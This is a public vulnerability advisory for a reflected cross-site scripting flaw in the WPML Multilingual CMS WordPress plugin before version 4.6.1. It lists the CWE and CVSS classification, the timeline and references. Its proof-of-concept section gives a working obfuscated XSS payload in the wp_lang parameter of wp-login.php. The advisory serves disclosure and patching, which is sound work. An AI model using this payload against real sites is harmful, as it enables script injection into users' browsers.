WordPress Plugin Vulnerabilities

WPML Multilingual CMS < 4.6.1 - Reflected Cross-Site Scripting

Description

The plugin does not escape some URL attributes before outputting them to a page, leading to a Reflected Cross-Site Scripting vulnerability.

Proof of Concept

After setting up the plugin, visit the following URL:

/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c

Affects Plugins

Plugin icon
sitepress-multilingual-cms
Fixed in 4.6.1

References

URL
https://wpml.org/changelog/2023/03/wpml-4-6-1-important-security-update/
URL
https://wpml.org/forums/topic/the-wpml-plugin-is-vulnerable-to-cross-site-scripting-xss-via-the-wp_lang-quer/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Submitter
Deepak kumar, 0xcharan
Verified
Yes
WPVDB ID
b9cc519c-7ec2-42c3-9f42-01e928e12139

Timeline

Publicly Published
2023-04-16 (about 1 years ago)
Added
2023-05-03 (about 1 years ago)
Last Updated
2023-05-04 (about 1 years ago)

Other

Published
Title
Published
2022-09-05
Title
Slider Hero < 8.4.4 - Admin+ Stored Cross-Site Scripting
Published
2024-03-29
Title
Ultimate Addons for Beaver Builder – Lite < 1.5.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via Image Separator Widget
Published
2015-10-13
Title
Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Published
2024-04-16
Title
EnvíaloSimple: Email Marketing y Newsletters < 2.3 - Reflected Cross-Site Scripting
Published
2024-03-18
Title
Automation By Autonami < 2.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting